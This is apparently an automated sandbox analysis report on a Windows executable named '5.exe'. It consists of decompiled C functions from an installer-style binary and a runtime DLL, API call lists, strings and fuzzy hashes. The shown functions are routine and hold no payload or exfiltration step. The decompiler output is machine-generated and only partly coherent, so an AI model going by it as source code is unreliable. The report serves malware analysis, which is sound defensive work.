                                                                                              • Instruction ID: 2a476676d2754548512cbb69fc9459b4cc21f0c31d3736dd6e3fa2e81433202f
                                                                                              • Opcode Fuzzy Hash: aa3fb9a950900c40074ee04d67a230966b039350a74236e4dddd9b35cb4f8ce8
                                                                                              • Instruction Fuzzy Hash: 31410EB5600208AFDB04CF94C994F9A7BB5BF88344F14C159FD488B385D771EA91CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 51%
                                                                                              			E004044B6(int _a4, intOrPtr _a8, unsigned int _a12) {
                                                                                              				char _v36;
                                                                                              				char _v68;
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				void* _t26;
                                                                                              				void* _t34;
                                                                                              				signed int _t36;
                                                                                              				signed int _t39;
                                                                                              				unsigned int _t46;
                                                                                              
                                                                                              				_t46 = _a12;
                                                                                              				_push(0x14);
                                                                                              				_pop(0);
                                                                                              				_t34 = 0xffffffdc;
                                                                                              				if(_t46 < 0x100000) {
                                                                                              					_push(0xa);
                                                                                              					_pop(0);
                                                                                              					_t34 = 0xffffffdd;
                                                                                              				}
                                                                                              				if(_t46 < 0x400) {
                                                                                              					_t34 = 0xffffffde;
                                                                                              				}
                                                                                              				if(_t46 < 0xffff3333) {
                                                                                              					_t39 = 0x14;
                                                                                              					asm("cdq");
                                                                                              					_t46 = _t46 + 1 / _t39;
                                                                                              				}
                                                                                              				_push(E0040594D(_t34, 0, _t46,  &_v36, 0xffffffdf));
                                                                                              				_push(E0040594D(_t34, 0, _t46,  &_v68, _t34));
                                                                                              				_t21 = _t46 & 0x00ffffff;
                                                                                              				_t36 = 0xa;
                                                                                              				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
                                                                                              				_push(_t46 >> 0);
                                                                                              				_t26 = E0040594D(_t34, 0, 0x429fd8, 0x429fd8, _a8);
                                                                                              				wsprintfA(_t26 + lstrlenA(0x429fd8), "%u.%u%s%s");
                                                                                              				return SetDlgItemTextA( *0x42e338, _a4, 0x429fd8);
                                                                                              			}














                                                                                              APIs
                                                                                              • lstrlenA.KERNEL32(00429FD8,00429FD8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004043D6,000000DF,0000040F,00000400,00000000), ref: 00404544
                                                                                              • wsprintfA.USER32 ref: 0040454C
                                                                                              • SetDlgItemTextA.USER32 ref: 0040455F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                                              • String ID: %u.%u%s%s
                                                                                              • API String ID: 3540041739-3551169577
                                                                                              • Opcode ID: 9ef419584118109bfe096c59dc58bdf2b1081d5b2e965ff29ec39ca84245abfe
                                                                                              • Instruction ID: e44b7de75f1afc080fd53ae6a7962c6c3308310fc923ee70d3b0388825d49f6b
                                                                                              • Opcode Fuzzy Hash: 9ef419584118109bfe096c59dc58bdf2b1081d5b2e965ff29ec39ca84245abfe
                                                                                              • Instruction Fuzzy Hash: CE11E2B3A0022467DB10A66A9C05EAF36599BC2334F14023BFA29F61D1E9388C1186A8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 51%
                                                                                              			E00401BAD() {
                                                                                              				signed int _t28;
                                                                                              				CHAR* _t31;
                                                                                              				long _t32;
                                                                                              				int _t37;
                                                                                              				signed int _t38;
                                                                                              				int _t42;
                                                                                              				int _t48;
                                                                                              				struct HWND__* _t52;
                                                                                              				void* _t55;
                                                                                              
                                                                                              				 *(_t55 - 0x34) = E004029CB(3);
                                                                                              				 *(_t55 + 8) = E004029CB(4);
                                                                                              				if(( *(_t55 - 0x10) & 0x00000001) != 0) {
                                                                                              					 *((intOrPtr*)(__ebp - 0x34)) = E004029E8(0x33);
                                                                                              				}
                                                                                              				__eflags =  *(_t55 - 0x10) & 0x00000002;
                                                                                              				if(( *(_t55 - 0x10) & 0x00000002) != 0) {
                                                                                              					 *(_t55 + 8) = E004029E8(0x44);
                                                                                              				}
                                                                                              				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - 0x21;
                                                                                              				_push(1);
                                                                                              				if(__eflags != 0) {
                                                                                              					_t50 = E004029E8();
                                                                                              					_t28 = E004029E8();
                                                                                              					asm("sbb ecx, ecx");
                                                                                              					asm("sbb eax, eax");
                                                                                              					_t31 =  ~( *_t27) & _t50;
                                                                                              					__eflags = _t31;
                                                                                              					_t32 = FindWindowExA( *(_t55 - 0x34),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
                                                                                              					goto L10;
                                                                                              				} else {
                                                                                              					_t52 = E004029CB();
                                                                                              					_t37 = E004029CB();
                                                                                              					_t48 =  *(_t55 - 0x10) >> 2;
                                                                                              					if(__eflags == 0) {
                                                                                              						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8));
                                                                                              						L10:
                                                                                              						 *(_t55 - 8) = _t32;
                                                                                              					} else {
                                                                                              						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8), _t42, _t48, _t55 - 8);
                                                                                              						asm("sbb eax, eax");
                                                                                              						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
                                                                                              					}
                                                                                              				}
                                                                                              				__eflags =  *((intOrPtr*)(_t55 - 0x24)) - _t42;
                                                                                              				if( *((intOrPtr*)(_t55 - 0x24)) >= _t42) {
                                                                                              					_push( *(_t55 - 8));
                                                                                              					E00405889();
                                                                                              				}
                                                                                              				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t55 - 4));
                                                                                              				return 0;
                                                                                              			}

                                                                                              APIs
                                                                                              • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
                                                                                              • SendMessageA.USER32 ref: 00401C25
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Timeout
                                                                                              • String ID: !
                                                                                              • API String ID: 1777923405-2657877971
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0040518B(CHAR* _a4) {
                                                                                              				struct _PROCESS_INFORMATION _v20;
                                                                                              				int _t7;
                                                                                              
                                                                                              				0x42bfe0->cb = 0x44;
                                                                                              				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x42bfe0,  &_v20);
                                                                                              				if(_t7 != 0) {
                                                                                              					CloseHandle(_v20.hThread);
                                                                                              					return _v20.hProcess;
                                                                                              				}
                                                                                              				return _t7;
                                                                                              			}

                                                                                              APIs
                                                                                              Strings
                                                                                              • Error launching installer, xrefs: 0040519E
                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 0040518B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: CloseCreateHandleProcess
                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
                                                                                              • API String ID: 3712363035-7751565
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0040541E(CHAR* _a4) {
                                                                                              				CHAR* _t7;
                                                                                              
                                                                                              				_t7 = _a4;
                                                                                              				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
                                                                                              					lstrcatA(_t7, 0x40900c);
                                                                                              				}
                                                                                              				return _t7;
                                                                                              			}

                                                                                              APIs
                                                                                              • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030CD,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405424
                                                                                              • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030CD,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 0040542D
                                                                                              • lstrcatA.KERNEL32(?,0040900C), ref: 0040543E
                                                                                              Strings
                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 0040541E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: CharPrevlstrcatlstrlen
                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                              • API String ID: 2659869361-823278215
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: string=%s$string=%s$unknown array format 0x%x
                                                                                              • API String ID: 0-3150054447
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: string=%s$string=%s$unknown array format 0x%x
                                                                                              • API String ID: 0-3150054447
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E6F1E7336(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                              				char _v8;
                                                                                              				intOrPtr _v12;
                                                                                              				int _v20;
                                                                                              				int _t35;
                                                                                              				int _t38;
                                                                                              				intOrPtr* _t44;
                                                                                              				int _t47;
                                                                                              				short* _t49;
                                                                                              				intOrPtr _t50;
                                                                                              				intOrPtr _t54;
                                                                                              				int _t55;
                                                                                              				int _t59;
                                                                                              				char* _t62;
                                                                                              
                                                                                              				_t62 = _a8;
                                                                                              				if(_t62 == 0) {
                                                                                              					L5:
                                                                                              					return 0;
                                                                                              				}
                                                                                              				_t50 = _a12;
                                                                                              				if(_t50 == 0) {
                                                                                              					goto L5;
                                                                                              				}
                                                                                              				if( *_t62 != 0) {
                                                                                              					E6F1E1DE3( &_v20, _a16);
                                                                                              					_t35 = _v20;
                                                                                              					__eflags =  *(_t35 + 0xa8);
                                                                                              					if( *(_t35 + 0xa8) != 0) {
                                                                                              						_t38 = E6F1E717C( *_t62 & 0x000000ff,  &_v20);
                                                                                              						__eflags = _t38;
                                                                                              						if(_t38 == 0) {
                                                                                              							__eflags = _a4;
                                                                                              							_t59 = 1;
                                                                                              							__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
                                                                                              							if(__eflags != 0) {
                                                                                              								L21:
                                                                                              								__eflags = _v8;
                                                                                              								if(_v8 != 0) {
                                                                                              									_t54 = _v12;
                                                                                              									_t31 = _t54 + 0x70;
                                                                                              									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
                                                                                              									__eflags =  *_t31;
                                                                                              								}
                                                                                              								return _t59;
                                                                                              							}
                                                                                              							L20:
                                                                                              							_t44 = E6F1E2A54(__eflags);
                                                                                              							_t59 = _t59 | 0xffffffff;
                                                                                              							__eflags = _t59;
                                                                                              							 *_t44 = 0x2a;
                                                                                              							goto L21;
                                                                                              						}
                                                                                              						_t59 = _v20;
                                                                                              						__eflags =  *(_t59 + 0x74) - 1;
                                                                                              						if( *(_t59 + 0x74) <= 1) {
                                                                                              							L15:
                                                                                              							__eflags = _t50 -  *(_t59 + 0x74);
                                                                                              							L16:
                                                                                              							if(__eflags < 0) {
                                                                                              								goto L20;
                                                                                              							}
                                                                                              							__eflags = _t62[1];
                                                                                              							if(__eflags == 0) {
                                                                                              								goto L20;
                                                                                              							}
                                                                                              							L18:
                                                                                              							_t59 =  *(_t59 + 0x74);
                                                                                              							goto L21;
                                                                                              						}
                                                                                              						__eflags = _t50 -  *(_t59 + 0x74);
                                                                                              						if(__eflags < 0) {
                                                                                              							goto L16;
                                                                                              						}
                                                                                              						__eflags = _a4;
                                                                                              						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
                                                                                              						_t59 = _v20;
                                                                                              						__eflags = _t47;
                                                                                              						if(_t47 != 0) {
                                                                                              							goto L18;
                                                                                              						}
                                                                                              						goto L15;
                                                                                              					}
                                                                                              					_t55 = _a4;
                                                                                              					__eflags = _t55;
                                                                                              					if(_t55 != 0) {
                                                                                              						 *_t55 =  *_t62 & 0x000000ff;
                                                                                              					}
                                                                                              					_t59 = 1;
                                                                                              					goto L21;
                                                                                              				}
                                                                                              				_t49 = _a4;
                                                                                              				if(_t49 != 0) {
                                                                                              					 *_t49 = 0;
                                                                                              				}
                                                                                              				goto L5;
                                                                                              			}

















                                                                                              APIs
                                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6F1E736C
                                                                                              • __isleadbyte_l.LIBCMT ref: 6F1E739A
                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 6F1E73C8
                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 6F1E73FE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                              • String ID:
                                                                                              • API String ID: 3058430110-0
                                                                                              • Opcode ID: 266193da64e6529cb1dbe4168aa8dd00d875465f4f8024536fa94fd6042959ba
                                                                                              • Instruction ID: 1b0ae90171ebab7857d9dba44f5ddbf46180901a5461698aae47371ca5ab04b5
                                                                                              • Opcode Fuzzy Hash: 266193da64e6529cb1dbe4168aa8dd00d875465f4f8024536fa94fd6042959ba
                                                                                              • Instruction Fuzzy Hash: B831A130604B46AFEB118F75CC44BAA7BB5FF613A0F15456AE8748B192E730F861DB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 85%
                                                                                              			E00401EC5(char __ebx, char* __edi, char* __esi) {
                                                                                              				char* _t18;
                                                                                              				int _t19;
                                                                                              				void* _t30;
                                                                                              
                                                                                              				_t18 = E004029E8(0xffffffee);
                                                                                              				 *(_t30 - 0x2c) = _t18;
                                                                                              				_t19 = GetFileVersionInfoSizeA(_t18, _t30 - 0x30);
                                                                                              				 *__esi = __ebx;
                                                                                              				 *(_t30 - 8) = _t19;
                                                                                              				 *__edi = __ebx;
                                                                                              				 *((intOrPtr*)(_t30 - 4)) = 1;
                                                                                              				if(_t19 != __ebx) {
                                                                                              					__eax = GlobalAlloc(0x40, __eax);
                                                                                              					 *(__ebp + 8) = __eax;
                                                                                              					if(__eax != __ebx) {
                                                                                              						if(__eax != 0) {
                                                                                              							__ebp - 0x44 = __ebp - 0x34;
                                                                                              							if(VerQueryValueA( *(__ebp + 8), 0x40900c, __ebp - 0x34, __ebp - 0x44) != 0) {
                                                                                              								 *(__ebp - 0x34) = E00405889(__esi,  *((intOrPtr*)( *(__ebp - 0x34) + 8)));
                                                                                              								 *(__ebp - 0x34) = E00405889(__edi,  *((intOrPtr*)( *(__ebp - 0x34) + 0xc)));
                                                                                              								 *((intOrPtr*)(__ebp - 4)) = __ebx;
                                                                                              							}
                                                                                              						}
                                                                                              						_push( *(__ebp + 8));
                                                                                              						GlobalFree();
                                                                                              					}
                                                                                              				}
                                                                                              				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t30 - 4));
                                                                                              				return 0;
                                                                                              			}







                                                                                              APIs
                                                                                              • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401ED4
                                                                                              • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
                                                                                              • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F0B
                                                                                              • VerQueryValueA.VERSION(?,0040900C,?,?,?,?,?,00000000), ref: 00401F24
                                                                                                • Part of subcall function 00405889: wsprintfA.USER32 ref: 00405896
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                                              • String ID:
                                                                                              • API String ID: 1404258612-0
                                                                                              • Opcode ID: 96c576a8d7c40e70efe5b4beeaa819c74075c8ca6966c6621d7a9c446a88aaa4
                                                                                              • Instruction ID: 5df6cf6993c09150fb4e954c2a2c9de352bdee8941cce83e0996c7e852039ca5
                                                                                              • Opcode Fuzzy Hash: 96c576a8d7c40e70efe5b4beeaa819c74075c8ca6966c6621d7a9c446a88aaa4
                                                                                              • Instruction Fuzzy Hash: 56111C72900108BEDB01EFA5DD45DAEBBB9EF04344B20807AF501F61E1D7789A54DB28
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E6F1E1E8C(void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                              				intOrPtr _t25;
                                                                                              				void* _t26;
                                                                                              
                                                                                              				_t25 = _a16;
                                                                                              				if(_t25 == 0x65 || _t25 == 0x45) {
                                                                                              					_t26 = E6F1E23DD(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                              					goto L9;
                                                                                              				} else {
                                                                                              					_t34 = _t25 - 0x66;
                                                                                              					if(_t25 != 0x66) {
                                                                                              						__eflags = _t25 - 0x61;
                                                                                              						if(_t25 == 0x61) {
                                                                                              							L7:
                                                                                              							_t26 = E6F1E1F12(_a4, _a8, _a12, _a20, _a24, _a28);
                                                                                              						} else {
                                                                                              							__eflags = _t25 - 0x41;
                                                                                              							if(__eflags == 0) {
                                                                                              								goto L7;
                                                                                              							} else {
                                                                                              								_t26 = E6F1E2658(__esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                              							}
                                                                                              						}
                                                                                              						L9:
                                                                                              						return _t26;
                                                                                              					} else {
                                                                                              						return E6F1E2597(__esi, _t34, _a4, _a8, _a12, _a20, _a28);
                                                                                              					}
                                                                                              				}
                                                                                              			}






                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                              • String ID:
                                                                                              • API String ID: 3016257755-0
                                                                                              • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                              • Instruction ID: 9dc7bc799d241c03bb9962e93e3e60d046b0631a7b2237fa3cf4265b0b79cad7
                                                                                              • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                              • Instruction Fuzzy Hash: 3F01363244058EBBCF125F94DC11CEE3F62BB2D395B458915FE6868460D336E5B1AB81
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E004054B2(char _a4) {
                                                                                              				CHAR* _t3;
                                                                                              				char* _t5;
                                                                                              				CHAR* _t7;
                                                                                              				CHAR* _t8;
                                                                                              				void* _t10;
                                                                                              
                                                                                              				_t1 =  &_a4; // 0x405264
                                                                                              				_t8 =  *_t1;
                                                                                              				_t7 = CharNextA(_t8);
                                                                                              				_t3 = CharNextA(_t7);
                                                                                              				if( *_t8 == 0 ||  *_t7 != 0x5c3a) {
                                                                                              					if( *_t8 != 0x5c5c) {
                                                                                              						L8:
                                                                                              						return 0;
                                                                                              					}
                                                                                              					_t10 = 2;
                                                                                              					while(1) {
                                                                                              						_t10 = _t10 - 1;
                                                                                              						_t5 = E00405449(_t3, 0x5c);
                                                                                              						if( *_t5 == 0) {
                                                                                              							goto L8;
                                                                                              						}
                                                                                              						_t3 = _t5 + 1;
                                                                                              						if(_t10 != 0) {
                                                                                              							continue;
                                                                                              						}
                                                                                              						return _t3;
                                                                                              					}
                                                                                              					goto L8;
                                                                                              				} else {
                                                                                              					return CharNextA(_t3);
                                                                                              				}
                                                                                              			}









                                                                                              APIs
                                                                                              • CharNextA.USER32(dR@,?,0042B3E0,00000000,00405516,0042B3E0,0042B3E0,?,?,00000000,00405264,?,"C:\Users\user\Desktop\5.exe" ,00000000), ref: 004054C0
                                                                                              • CharNextA.USER32(00000000), ref: 004054C5
                                                                                              • CharNextA.USER32(00000000), ref: 004054D4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: CharNext
                                                                                              • String ID: dR@
                                                                                              • API String ID: 3213498283-1322173608
                                                                                              • Opcode ID: e3875c486b2c61f66053de752efbb5dda379102a37ce04da83dd8a0f358ee579
                                                                                              • Instruction ID: ba3132894351e94c97711127f452fc04d7c27ede8e93237e74fa5b384ede3bcd
                                                                                              • Opcode Fuzzy Hash: e3875c486b2c61f66053de752efbb5dda379102a37ce04da83dd8a0f358ee579
                                                                                              • Instruction Fuzzy Hash: AAF0A751944B2165E73222AC5C44BFB6B9CDB55712F144437E600B61D186BC5CC29FBA
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 67%
                                                                                              			E00401D1B() {
                                                                                              				void* __esi;
                                                                                              				int _t6;
                                                                                              				signed char _t11;
                                                                                              				struct HFONT__* _t14;
                                                                                              				void* _t18;
                                                                                              				void* _t24;
                                                                                              				void* _t26;
                                                                                              				void* _t28;
                                                                                              
                                                                                              				_t6 = GetDeviceCaps(GetDC( *(_t28 - 0x34)), 0x5a);
                                                                                              				0x40af7c->lfHeight =  ~(MulDiv(E004029CB(2), _t6, 0x48));
                                                                                              				 *0x40af8c = E004029CB(3);
                                                                                              				_t11 =  *((intOrPtr*)(_t28 - 0x14));
                                                                                              				 *0x40af93 = 1;
                                                                                              				 *0x40af90 = _t11 & 0x00000001;
                                                                                              				 *0x40af91 = _t11 & 0x00000002;
                                                                                              				 *0x40af92 = _t11 & 0x00000004;
                                                                                              				E0040594D(_t18, _t24, _t26, 0x40af98,  *((intOrPtr*)(_t28 - 0x20)));
                                                                                              				_t14 = CreateFontIndirectA(0x40af7c);
                                                                                              				_push(_t14);
                                                                                              				_push(_t26);
                                                                                              				E00405889();
                                                                                              				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t28 - 4));
                                                                                              				return 0;
                                                                                              			}












                                                                                              APIs
                                                                                              • GetDC.USER32(?), ref: 00401D22
                                                                                              • GetDeviceCaps.GDI32(00000000), ref: 00401D29
                                                                                              • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
                                                                                              • CreateFontIndirectA.GDI32(0040AF7C), ref: 00401D8A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: CapsCreateDeviceFontIndirect
